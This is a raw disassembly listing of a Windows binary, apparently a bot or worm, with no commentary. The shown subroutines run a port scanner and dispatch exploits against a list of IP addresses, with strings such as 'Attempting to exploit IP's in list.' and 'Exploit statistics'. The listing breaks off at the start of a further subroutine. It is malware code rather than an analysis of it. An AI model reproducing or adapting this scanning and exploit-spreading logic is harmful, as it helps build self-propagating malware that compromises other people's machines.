loc_413AEB: ; CODE XREF: sub_413AB0+25�j
and [ebp+var_14], 0
jmp short loc_413AF8
; ---------------------------------------------------------------------------
loc_413AF1: ; CODE XREF: sub_413AB0:loc_413B43�j
mov eax, [ebp+var_14]
inc eax
mov [ebp+var_14], eax
loc_413AF8: ; CODE XREF: sub_413AB0+3F�j
mov eax, [ebp+var_14]
imul eax, 3Ah
movsx eax, byte ptr aJeP[eax] ; "†…Øݯ"
test eax, eax
jnz short loc_413B0E
jmp locret_413CB1
; ---------------------------------------------------------------------------
loc_413B0E: ; CODE XREF: sub_413AB0+57�j
mov eax, [ebp+var_14]
imul eax, 3Ah
add eax, offset aJeP ; "†…Øݯ"
push eax
lea eax, [ebp+var_28]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
lea eax, [ebp+var_28]
push eax
call sub_4105FB
pop ecx
push [ebp+arg_8]
lea eax, [ebp+var_28]
push eax
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_413B43
jmp short loc_413B45
; ---------------------------------------------------------------------------
loc_413B43: ; CODE XREF: sub_413AB0+8F�j
jmp short loc_413AF1
; ---------------------------------------------------------------------------
loc_413B45: ; CODE XREF: sub_413AB0:loc_413AE9�j
; sub_413AB0+91�j
cmp [ebp+arg_C], 0
jz short loc_413B59
push [ebp+arg_C]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_2C], eax
jmp short loc_413B60
; ---------------------------------------------------------------------------
loc_413B59: ; CODE XREF: sub_413AB0+99�j
mov [ebp+var_2C], 15180h
loc_413B60: ; CODE XREF: sub_413AB0+A7�j
mov eax, [ebp+var_2C]
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_413B75
cmp [ebp+var_4], 15180h
jbe short loc_413B7C
loc_413B75: ; CODE XREF: sub_413AB0+BA�j
mov [ebp+var_4], 15180h
loc_413B7C: ; CODE XREF: sub_413AB0+C3�j
cmp [ebp+arg_10], 0
jz short loc_413B90
push [ebp+arg_10]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_30], eax
jmp short loc_413B97
; ---------------------------------------------------------------------------
loc_413B90: ; CODE XREF: sub_413AB0+D0�j
mov [ebp+var_30], 7D0h
loc_413B97: ; CODE XREF: sub_413AB0+DE�j
mov eax, [ebp+var_30]
mov [ebp+var_C], eax
cmp [ebp+var_C], 32h
jb short loc_413BAC
cmp [ebp+var_C], 0EA60h
jbe short loc_413BB3
loc_413BAC: ; CODE XREF: sub_413AB0+F1�j
mov [ebp+var_C], 7D0h
loc_413BB3: ; CODE XREF: sub_413AB0+FA�j
cmp [ebp+arg_14], 0
jz short loc_413BC7
push [ebp+arg_14]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_34], eax
jmp short loc_413BCE
; ---------------------------------------------------------------------------
loc_413BC7: ; CODE XREF: sub_413AB0+107�j
mov [ebp+var_34], 100h
loc_413BCE: ; CODE XREF: sub_413AB0+115�j
mov eax, [ebp+var_34]
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jz short loc_413BE3
cmp [ebp+var_10], 200h
jbe short loc_413BEA
loc_413BE3: ; CODE XREF: sub_413AB0+128�j
mov [ebp+var_10], 100h
loc_413BEA: ; CODE XREF: sub_413AB0+131�j
push 2C9h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_413C03
jmp locret_413CB1
; ---------------------------------------------------------------------------
loc_413C03: ; CODE XREF: sub_413AB0+14C�j
push 108h
push [ebp+arg_4]
mov eax, [ebp+var_8]
add eax, 4
push eax
call sub_407A56
add esp, 0Ch
push 0Eh
push [ebp+arg_8]
mov eax, [ebp+var_8]
add eax, 10Ch
push eax
call sub_407A56
add esp, 0Ch
mov eax, [ebp+var_8]
mov ecx, [ebp+var_4]
mov [eax+11Ah], ecx
mov eax, [ebp+var_8]
mov ecx, [ebp+var_C]
mov [eax+11Eh], ecx
mov eax, [ebp+var_8]
mov ecx, [ebp+var_10]
mov [eax+122h], ecx
push 1A3h
push [ebp+arg_0]
mov eax, [ebp+var_8]
add eax, 126h
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+var_10]
push [ebp+var_C]
mov eax, [ebp+var_8]
push dword ptr [eax+11Ah]
mov eax, [ebp+var_8]
add eax, 10Ch
push eax
mov eax, [ebp+var_8]
add eax, 4
push eax
push offset unk_41CEA4
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+18Bh]
neg eax
sbb eax, eax
inc eax
push eax
push [ebp+var_8]
push offset loc_41349C
call sub_4095A4
add esp, 24h
locret_413CB1: ; CODE XREF: sub_413AB0:loc_413AC2�j
; sub_413AB0+34�j ...
leave
retn
sub_413AB0 endp
; ---------------------------------------------------------------------------
loc_413CB3: ; DATA XREF: sub_413FE7+5C�o
push ebp
mov ebp, esp
sub esp, 49Ch
push 327h
push dword ptr [ebp+8]
lea eax, [ebp-330h]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push dword ptr [ebp+8]
call sub_416B4C ; free
pop ecx
mov eax, [ebp-330h]
push dword ptr [eax]
push offset unk_41CF50
lea eax, [ebp-1ACh]
push eax
call sub_40D53F
add esp, 0Ch
and dword ptr [ebp-334h], 0
and dword ptr [ebp-484h], 0
lea eax, [ebp-4]
push eax
push offset dword_418F4C
lea eax, [ebp-32Ch]
push eax
call sub_40813C
add esp, 0Ch
mov [ebp-8], eax
loc_413D21: ; CODE XREF: .text:loc_413FA8�j
mov eax, [ebp-334h]
inc eax
mov [ebp-334h], eax
and dword ptr [ebp-488h], 0
jmp short loc_413D44
; ---------------------------------------------------------------------------
loc_413D37: ; CODE XREF: .text:00413EEE�j
; .text:loc_413F77�j
mov eax, [ebp-488h]
inc eax
mov [ebp-488h], eax
loc_413D44: ; CODE XREF: .text:00413D35�j
mov eax, [ebp-488h]
imul eax, 3Ah
cmp off_41CCFE[eax], 0
jz loc_413F7C
push 3Ah
mov eax, [ebp-488h]
imul eax, 3Ah
add eax, offset aJeP ; "†…Øݯ"
push eax
lea eax, [ebp-47Ch]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp-488h]
imul eax, 3Ah
add eax, offset aJeP ; "†…Øݯ"
mov [ebp-480h], eax
lea eax, [ebp-47Ch]
push eax
call sub_4105FB
pop ecx
lea eax, [ebp-469h]
push eax
call sub_4105FB
pop ecx
cmp dword ptr [ebp-480h], 0
jz loc_413E9A
mov eax, [ebp-480h]
mov eax, [eax+32h]
and eax, 1
test eax, eax
jz loc_413E9A
call sub_4042FB
mov [ebp-490h], eax
cmp dword ptr [ebp-490h], 0
jz short loc_413DE9
mov dword ptr [ebp-3BEh], 2
jmp short loc_413DF3
; ---------------------------------------------------------------------------
loc_413DE9: ; CODE XREF: .text:00413DDB�j
mov dword ptr [ebp-3BEh], 3
loc_413DF3: ; CODE XREF: .text:00413DE7�j
movsx eax, byte ptr [ebp-15h]
test eax, eax
jz short loc_413E15
mov eax, [ebp-480h]
mov eax, [eax+32h]
and eax, 2
test eax, eax
jnz short loc_413E15
mov dword ptr [ebp-3BEh], 1
loc_413E15: ; CODE XREF: .text:00413DF9�j
; .text:00413E09�j
movsx eax, byte ptr [ebp-25h]
test eax, eax
jz short loc_413E27
mov dword ptr [ebp-3BEh], 2
loc_413E27: ; CODE XREF: .text:00413E1B�j
movsx eax, byte ptr [ebp-24h]
test eax, eax
jz short loc_413E39
mov dword ptr [ebp-3BEh], 3
loc_413E39: ; CODE XREF: .text:00413E2D�j
cmp dword ptr [ebp-3BEh], 3
jnz short loc_413E55
cmp dword ptr [ebp-490h], 0
jz short loc_413E55
mov dword ptr [ebp-3BEh], 2
loc_413E55: ; CODE XREF: .text:00413E40�j
; .text:00413E49�j
cmp dword ptr [ebp-3BEh], 3
jnz short loc_413E9A
mov al, [ebp-14h]
mov [ebp-498h], al
mov al, [ebp-21h]
mov [ebp-494h], al
mov byte ptr [ebp-14h], 1
and byte ptr [ebp-21h], 0
push 0
lea eax, [ebp-1ACh]
push eax
call sub_412F07
pop ecx
pop ecx
mov al, [ebp-498h]
mov [ebp-14h], al
mov al, [ebp-494h]
mov [ebp-21h], al
loc_413E9A: ; CODE XREF: .text:00413DAF�j
; .text:00413DC3�j ...
movsx eax, byte ptr [ebp-13h]
neg eax
sbb eax, eax
and eax, 1388h
add eax, 1388h
push eax
push 0
lea eax, [ebp-469h]
push eax
push dword ptr [ebp-8]
call sub_4050EA
add esp, 10h
mov [ebp-48Ch], eax
cmp dword ptr [ebp-48Ch], 0
jz loc_413F77
push 14Ch
call sub_416B46 ; malloc
pop ecx
mov [ebp-49Ch], eax
cmp dword ptr [ebp-49Ch], 0
jnz short loc_413EF3
jmp loc_413D37
; ---------------------------------------------------------------------------
loc_413EF3: ; CODE XREF: .text:00413EEC�j
push 14Ch
lea eax, [ebp-480h]
push eax
push dword ptr [ebp-49Ch]
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp-484h]
inc eax
mov [ebp-484h], eax
mov eax, [ebp-49Ch]
mov ecx, [ebp-48Ch]
mov [eax+3Eh], ecx
push dword ptr [ebp-49Ch]
push offset loc_41331E
call sub_409479
pop ecx
pop ecx
test eax, eax
jnz short loc_413F59
push dword ptr [ebp-48Ch]
call sub_4053B1
pop ecx
push dword ptr [ebp-49Ch]
call sub_416B4C ; free
pop ecx
jmp short loc_413F77
; ---------------------------------------------------------------------------
loc_413F59: ; CODE XREF: .text:00413F3D�j
lea eax, [ebp-47Ch]
push eax
push dword ptr [ebp-8]
push offset dword_41CF20
lea eax, [ebp-1ACh]
push eax
call sub_40D53F
add esp, 10h
loc_413F77: ; CODE XREF: .text:00413ECE�j
; .text:00413F57�j
jmp loc_413D37
; ---------------------------------------------------------------------------
loc_413F7C: ; CODE XREF: .text:00413D54�j
lea eax, [ebp-4]
push eax
push offset dword_418F4C
push 0
call sub_40813C
add esp, 0Ch
mov [ebp-8], eax
cmp dword ptr [ebp-8], 0
jnz short loc_413F9A
jmp short loc_413FAD
; ---------------------------------------------------------------------------
loc_413F9A: ; CODE XREF: .text:00413F96�j
mov eax, [ebp-330h]
cmp dword ptr [eax+4], 0
jz short loc_413FA8
jmp short loc_413FAD
; ---------------------------------------------------------------------------
loc_413FA8: ; CODE XREF: .text:00413FA4�j
jmp loc_413D21
; ---------------------------------------------------------------------------
loc_413FAD: ; CODE XREF: .text:00413F98�j
; .text:00413FA6�j
push dword ptr [ebp-334h]
push dword ptr [ebp-484h]
mov eax, [ebp-330h]
push dword ptr [eax]
push offset dword_41CEDC
lea eax, [ebp-1ACh]
push eax
call sub_40D53F
add esp, 14h
push dword ptr [ebp-330h]
call sub_409763
pop ecx
xor eax, eax
leave
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413FE7 proc near ; CODE XREF: sub_40A9CF+B5B�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
cmp [ebp+arg_4], 0
jnz short loc_413FF3
jmp short locret_414050
; ---------------------------------------------------------------------------
loc_413FF3: ; CODE XREF: sub_413FE7+8�j
push 327h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_414009
jmp short locret_414050
; ---------------------------------------------------------------------------
loc_414009: ; CODE XREF: sub_413FE7+1E�j
push 180h
push [ebp+arg_4]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_407A56
add esp, 0Ch
push 1A3h
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 184h
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push offset aAttemptingToEx ; "Attempting to exploit IP's in list."
push 0
push [ebp+var_4]
push offset loc_413CB3
call sub_4095A4
add esp, 10h
locret_414050: ; CODE XREF: sub_413FE7+A�j
; sub_413FE7+20�j
leave
retn
sub_413FE7 endp
; ---------------------------------------------------------------------------
loc_414052: ; DATA XREF: sub_41417D+35�o
push ebp
mov ebp, esp
sub esp, 3C0h
push 1A7h
push dword ptr [ebp+8]
lea eax, [ebp-3C0h]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push dword ptr [ebp+8]
call sub_416B4C ; free
pop ecx
push offset aExploitStatist ; "Exploit statistics - "
lea eax, [ebp-200h]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
and dword ptr [ebp-204h], 0
jmp short loc_4140A4
; ---------------------------------------------------------------------------
loc_414097: ; CODE XREF: .text:loc_41414A�j
mov eax, [ebp-204h]
inc eax
mov [ebp-204h], eax
loc_4140A4: ; CODE XREF: .text:00414095�j
mov eax, [ebp-204h]
imul eax, 3Ah
movsx eax, byte ptr aJeP[eax] ; "†…Øݯ"
test eax, eax
jz loc_41414F
push 12h
mov eax, [ebp-204h]
imul eax, 3Ah
add eax, offset aJeP ; "†…Øݯ"
push eax
lea eax, [ebp-218h]
push eax
call sub_407A56
add esp, 0Ch
lea eax, [ebp-218h]
push eax
call sub_4105FB
pop ecx
lea eax, [ebp-218h]
push eax
lea eax, [ebp-200h]
push eax
call sub_416B70 ; _mbscat
pop ecx
pop ecx
mov eax, [ebp-204h]
imul eax, 3Ah
push dword_41CCFA[eax]
push offset dword_41CFA4
lea eax, [ebp-200h]
push eax
call sub_416B40 ; strlen
pop ecx
lea eax, [ebp+eax-200h]
push eax
call sub_416B5E ; sprintf
add esp, 0Ch
movsx eax, byte ptr [ebp-225h]
test eax, eax
jz short loc_41414A
mov eax, [ebp-204h]
imul eax, 3Ah
and dword_41CCFA[eax], 0
loc_41414A: ; CODE XREF: .text:00414138�j
jmp loc_414097
; ---------------------------------------------------------------------------
loc_41414F: ; CODE XREF: .text:004140B6�j
and byte ptr [ebp-224h], 0
lea eax, [ebp-200h]
push eax
lea eax, [ebp-3BCh]
push eax
call sub_40D53F
pop ecx
pop ecx
push dword ptr [ebp-3C0h]
call sub_409763
pop ecx
xor eax, eax
leave
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41417D proc near ; CODE XREF: sub_40A9CF+BF4�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push 1A7h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_414197
jmp short locret_4141BF
; ---------------------------------------------------------------------------
loc_414197: ; CODE XREF: sub_41417D+16�j
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_405F67
pop ecx
pop ecx
push offset aListingExploit ; "Listing exploit statistics"
push 0
push [ebp+var_4]
push offset loc_414052
call sub_4095A4
add esp, 10h
locret_4141BF: ; CODE XREF: sub_41417D+18�j
leave
retn
sub_41417D endp
; ---------------------------------------------------------------------------
loc_4141C1: ; DATA XREF: sub_4142BF+E2�o
push ebp
mov ebp, esp
sub esp, 2BCh
push 2B1h
push dword ptr [ebp+8]
lea eax, [ebp-2BCh]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push dword ptr [ebp+8]
call sub_416B4C ; free
pop ecx
call sub_416B64 ; clock
mov [ebp-4], eax
push dword ptr [ebp-1B2h]
push 0
lea eax, [ebp-1B8h]
push eax
lea eax, [ebp-2B8h]
push eax
call sub_4050EA
add esp, 10h
mov [ebp-8], eax
cmp dword ptr [ebp-8], 0
jz short loc_41424F
push dword ptr [ebp-8]
call sub_4053B1
pop ecx
call sub_416B64 ; clock
sub eax, [ebp-4]
push eax
lea eax, [ebp-1B8h]
push eax
lea eax, [ebp-2B8h]
push eax
push offset dword_41D050
lea eax, [ebp-1AEh]
push eax
call sub_40D53F
add esp, 14h
jmp short loc_4142AD
; ---------------------------------------------------------------------------
loc_41424F: ; CODE XREF: .text:00414217�j
movsx eax, byte ptr [ebp-16h]
test eax, eax
jnz short loc_4142AD
call sub_416B64 ; clock
sub eax, [ebp-4]
cmp eax, [ebp-1B2h]
jb short loc_41428B
lea eax, [ebp-1B8h]
push eax
lea eax, [ebp-2B8h]
push eax
push offset dword_41D018
lea eax, [ebp-1AEh]
push eax
call sub_40D53F
add esp, 10h
jmp short loc_4142AD
; ---------------------------------------------------------------------------
loc_41428B: ; CODE XREF: .text:00414265�j
lea eax, [ebp-1B8h]
push eax
lea eax, [ebp-2B8h]
push eax
push offset dword_41CFE8
lea eax, [ebp-1AEh]
push eax
call sub_40D53F
add esp, 10h
loc_4142AD: ; CODE XREF: .text:0041424D�j
; .text:00414255�j ...
push dword ptr [ebp-2BCh]
call sub_409763
pop ecx
xor eax, eax
leave
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4142BF proc near ; CODE XREF: sub_40A9CF+1B5E�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 10h
cmp [ebp+arg_4], 0
jnz short loc_4142D0
jmp locret_4143AE
; ---------------------------------------------------------------------------
loc_4142D0: ; CODE XREF: sub_4142BF+A�j
cmp [ebp+arg_8], 0
jnz short loc_4142DD
mov [ebp+arg_8], offset a80 ; "80"
loc_4142DD: ; CODE XREF: sub_4142BF+15�j
push [ebp+arg_8]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_4142F8
cmp [ebp+var_8], 0FFFFh
jbe short loc_4142FD
loc_4142F8: ; CODE XREF: sub_4142BF+2E�j
jmp locret_4143AE
; ---------------------------------------------------------------------------
loc_4142FD: ; CODE XREF: sub_4142BF+37�j
cmp [ebp+arg_C], 0
jz short loc_414311
push [ebp+arg_C]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_10], eax
jmp short loc_414318
; ---------------------------------------------------------------------------
loc_414311: ; CODE XREF: sub_4142BF+42�j
mov [ebp+var_10], 0EA60h
loc_414318: ; CODE XREF: sub_4142BF+50�j
mov eax, [ebp+var_10]
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_41432D
cmp [ebp+var_4], 36EE80h
jbe short loc_41432F
loc_41432D: ; CODE XREF: sub_4142BF+63�j
jmp short locret_4143AE
; ---------------------------------------------------------------------------
loc_41432F: ; CODE XREF: sub_4142BF+6C�j
push 2B1h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jnz short loc_414345
jmp short locret_4143AE
; ---------------------------------------------------------------------------
loc_414345: ; CODE XREF: sub_4142BF+82�j
push 100h
push [ebp+arg_4]
mov eax, [ebp+var_C]
add eax, 4
push eax
call sub_407A56
add esp, 0Ch
push 6
push [ebp+arg_8]
mov eax, [ebp+var_C]
add eax, 104h
push eax
call sub_407A56
add esp, 0Ch
mov eax, [ebp+var_C]
mov ecx, [ebp+var_4]
mov [eax+10Ah], ecx
push [ebp+arg_0]
mov eax, [ebp+var_C]
add eax, 10Eh
push eax
call sub_405F67
pop ecx
pop ecx
push [ebp+arg_8]
push [ebp+arg_4]
push offset dword_41D080
push 0
push [ebp+var_C]
push offset loc_4141C1
call sub_4095A4
add esp, 18h
locret_4143AE: ; CODE XREF: sub_4142BF+C�j
; sub_4142BF:loc_4142F8�j ...
leave
retn
sub_4142BF endp
; ---------------------------------------------------------------------------
loc_4143B0: ; DATA XREF: sub_414600+1D6�o
push ebp
mov ebp, esp
sub esp, 2DCh
push 2B3h
push dword ptr [ebp+8]
lea eax, [ebp-2C0h]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push dword ptr [ebp+8]
call sub_416B4C ; free
pop ecx
mov ax, [ebp-1BCh]
mov [ebp-0Ch], ax
push dword ptr [ebp-1B4h]
call sub_404D10
pop ecx
mov [ebp-8], eax
cmp dword ptr [ebp-8], 0
jnz short loc_41440C
push dword ptr [ebp-2C0h]
call sub_409763
pop ecx
xor eax, eax
jmp locret_4145FC
; ---------------------------------------------------------------------------
loc_41440C: ; CODE XREF: .text:004143F7�j
push dword ptr [ebp-1B4h]
movzx eax, word ptr [ebp-1BAh]
push eax
movzx eax, word ptr [ebp-1BCh]
push eax
lea eax, [ebp-2BCh]
push eax
mov eax, [ebp-2C0h]
push dword ptr [eax]
push offset dword_41D0F0
lea eax, [ebp-1B0h]
push eax
call sub_40D53F
add esp, 1Ch
movsx eax, byte ptr [ebp-18h]
test eax, eax
jnz short loc_414458
push 3E8h
call ds:dword_41709C ; Sleep
loc_414458: ; CODE XREF: .text:0041444B�j
call sub_416B64 ; clock
mov [ebp-2C4h], eax
and dword ptr [ebp-4], 0
loc_414467: ; CODE XREF: .text:004144EA�j
; .text:004145A0�j
mov eax, [ebp-2C0h]
cmp dword ptr [eax+4], 0
jnz short loc_414482
movzx eax, word ptr [ebp-0Ch]
movzx ecx, word ptr [ebp-1BAh]
cmp eax, ecx
jle short loc_414487
loc_414482: ; CODE XREF: .text:00414471�j
jmp loc_4145A5
; ---------------------------------------------------------------------------
loc_414487: ; CODE XREF: .text:00414480�j
push 0Ah
lea eax, [ebp-2CCh]
push eax
movzx eax, word ptr [ebp-0Ch]
push eax
call sub_416F7A ; _itoa
add esp, 0Ch
push dword ptr [ebp-8]
push 0
lea eax, [ebp-2CCh]
push eax
lea eax, [ebp-2BCh]
push eax
call sub_404FE7
add esp, 0Ch
push eax
call sub_404D4D
pop ecx
pop ecx
mov [ebp-2D0h], eax
mov ax, [ebp-0Ch]
add ax, 1
mov [ebp-0Ch], ax
cmp dword ptr [ebp-2D0h], 0
jz short loc_4144EF
movzx eax, word ptr [ebp-0Ch]
movzx ecx, word ptr [ebp-1BAh]
cmp eax, ecx
jg short loc_4144EF
jmp loc_414467
; ---------------------------------------------------------------------------
loc_4144EF: ; CODE XREF: .text:004144D9�j
; .text:004144E8�j
push dword ptr [ebp-1B8h]
call ds:dword_41709C ; Sleep
push dword ptr [ebp-8]
call sub_404E1C
pop ecx
test eax, eax
jz loc_414597
loc_41450C: ; CODE XREF: .text:00414592�j
mov eax, [ebp-2C0h]
cmp dword ptr [eax+4], 0
jz short loc_41451A
jmp short loc_414597
; ---------------------------------------------------------------------------
loc_41451A: ; CODE XREF: .text:00414516�j
push dword ptr [ebp-8]
call sub_404F24
pop ecx
mov [ebp-2D8h], eax
cmp dword ptr [ebp-2D8h], 0
jnz short loc_414534
jmp short loc_414597
; ---------------------------------------------------------------------------
loc_414534: ; CODE XREF: .text:00414530�j
lea eax, [ebp-2CCh]
push eax
push dword ptr [ebp-2D8h]
call sub_4045B2
pop ecx
pop ecx
mov eax, [ebp-4]
inc eax
mov [ebp-4], eax
mov al, [ebp-18h]
mov [ebp-2D4h], al
and byte ptr [ebp-18h], 0
lea eax, [ebp-2CCh]
push eax
lea eax, [ebp-2BCh]
push eax
push offset dword_41D0DC
lea eax, [ebp-1B0h]
push eax
call sub_40D53F
add esp, 10h
mov al, [ebp-2D4h]
mov [ebp-18h], al
push 3E8h
call ds:dword_41709C ; Sleep
jmp loc_41450C
; ---------------------------------------------------------------------------
loc_414597: ; CODE XREF: .text:00414506�j
; .text:00414518�j ...
push dword ptr [ebp-8]
call sub_404F7D
pop ecx
jmp loc_414467
; ---------------------------------------------------------------------------
loc_4145A5: ; CODE XREF: .text:loc_414482�j
push dword ptr [ebp-4]
call sub_416B64 ; clock
sub eax, [ebp-2C4h]
mov [ebp-2DCh], eax
fild dword ptr [ebp-2DCh]
fdiv ds:flt_417270
push ecx
push ecx
fstp qword ptr [esp]
lea eax, [ebp-2BCh]
push eax
push offset unk_41D0A0
lea eax, [ebp-1B0h]
push eax
call sub_40D53F
add esp, 18h
push dword ptr [ebp-8]
call sub_404FD0
pop ecx
push dword ptr [ebp-2C0h]
call sub_409763
pop ecx
xor eax, eax
locret_4145FC: ; CODE XREF: .text:00414407�j
leave
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414600 proc near ; CODE XREF: sub_40A9CF+C9C�p
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 28h
cmp [ebp+arg_4], 0
jz short loc_414612
cmp [ebp+arg_8], 0
jnz short loc_414617
loc_414612: ; CODE XREF: sub_414600+A�j
jmp locret_4147E3
; ---------------------------------------------------------------------------
loc_414617: ; CODE XREF: sub_414600+10�j
cmp [ebp+arg_C], 0
jnz short loc_414623
mov eax, [ebp+arg_8]
mov [ebp+arg_C], eax
loc_414623: ; CODE XREF: sub_414600+1B�j
push [ebp+arg_8]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_41463E
cmp [ebp+var_8], 0FFFFh
jbe short loc_414643
loc_41463E: ; CODE XREF: sub_414600+33�j
jmp locret_4147E3
; ---------------------------------------------------------------------------
loc_414643: ; CODE XREF: sub_414600+3C�j
push [ebp+arg_C]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_14], eax
cmp [ebp+var_14], 0
jz short loc_41465E
cmp [ebp+var_14], 0FFFFh
jbe short loc_414663
loc_41465E: ; CODE XREF: sub_414600+53�j
jmp locret_4147E3
; ---------------------------------------------------------------------------
loc_414663: ; CODE XREF: sub_414600+5C�j
push 2B3h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_41467C
jmp locret_4147E3
; ---------------------------------------------------------------------------
loc_41467C: ; CODE XREF: sub_414600+75�j
mov eax, [ebp+var_8]
cmp eax, [ebp+var_14]
jbe short loc_414696
mov eax, [ebp+var_14]
mov [ebp+var_18], eax
mov eax, [ebp+var_8]
mov [ebp+var_14], eax
mov eax, [ebp+var_18]
mov [ebp+var_8], eax
loc_414696: ; CODE XREF: sub_414600+82�j
cmp [ebp+arg_10], 0
jz short loc_4146AA
push [ebp+arg_10]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_1C], eax
jmp short loc_4146B1
; ---------------------------------------------------------------------------
loc_4146AA: ; CODE XREF: sub_414600+9A�j
mov [ebp+var_1C], 7D0h
loc_4146B1: ; CODE XREF: sub_414600+A8�j
mov eax, [ebp+var_1C]
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jz short loc_4146C6
cmp [ebp+var_C], 0EA60h
jbe short loc_4146CD
loc_4146C6: ; CODE XREF: sub_414600+BB�j
mov [ebp+var_C], 7D0h
loc_4146CD: ; CODE XREF: sub_414600+C4�j
cmp [ebp+arg_14], 0
jz short loc_4146E1
push [ebp+arg_14]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_20], eax
jmp short loc_4146E8
; ---------------------------------------------------------------------------
loc_4146E1: ; CODE XREF: sub_414600+D1�j
mov [ebp+var_20], 100h
loc_4146E8: ; CODE XREF: sub_414600+DF�j
mov eax, [ebp+var_20]
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jz short loc_4146FD
cmp [ebp+var_10], 200h
jbe short loc_414704
loc_4146FD: ; CODE XREF: sub_414600+F2�j
mov [ebp+var_10], 100h
loc_414704: ; CODE XREF: sub_414600+FB�j
push 100h
push [ebp+arg_4]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_416B58 ; strncpy
add esp, 0Ch
mov eax, [ebp+var_4]
mov cx, word ptr [ebp+var_8]
mov [eax+104h], cx
mov eax, [ebp+var_4]
mov cx, word ptr [ebp+var_14]
mov [eax+106h], cx
cmp [ebp+var_C], 0EA60h
jbe short loc_414749
mov [ebp+var_24], 0EA60h
jmp short loc_41474F
; ---------------------------------------------------------------------------
loc_414749: ; CODE XREF: sub_414600+13E�j
mov eax, [ebp+var_C]
mov [ebp+var_24], eax
loc_41474F: ; CODE XREF: sub_414600+147�j
mov eax, [ebp+var_4]
mov ecx, [ebp+var_24]
mov [eax+108h], ecx
cmp [ebp+var_10], 200h
jbe short loc_41476D
mov [ebp+var_28], 200h
jmp short loc_414773
; ---------------------------------------------------------------------------
loc_41476D: ; CODE XREF: sub_414600+162�j
mov eax, [ebp+var_10]
mov [ebp+var_28], eax
loc_414773: ; CODE XREF: sub_414600+16B�j
mov eax, [ebp+var_4]
mov ecx, [ebp+var_28]
mov [eax+10Ch], ecx
push 1A3h
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 110h
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_4]
push dword ptr [eax+10Ch]
mov eax, [ebp+var_4]
movzx eax, word ptr [eax+106h]
push eax
mov eax, [ebp+var_4]
movzx eax, word ptr [eax+104h]
push eax
mov eax, [ebp+var_4]
add eax, 4
push eax
push offset dword_41D138
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+18Bh]
neg eax
sbb eax, eax
inc eax
push eax
push [ebp+var_4]
push offset loc_4143B0
call sub_4095A4
add esp, 20h
locret_4147E3: ; CODE XREF: sub_414600:loc_414612�j
; sub_414600:loc_41463E�j ...
leave
retn
sub_414600 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4147E5 proc near ; CODE XREF: .text:00414D91�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
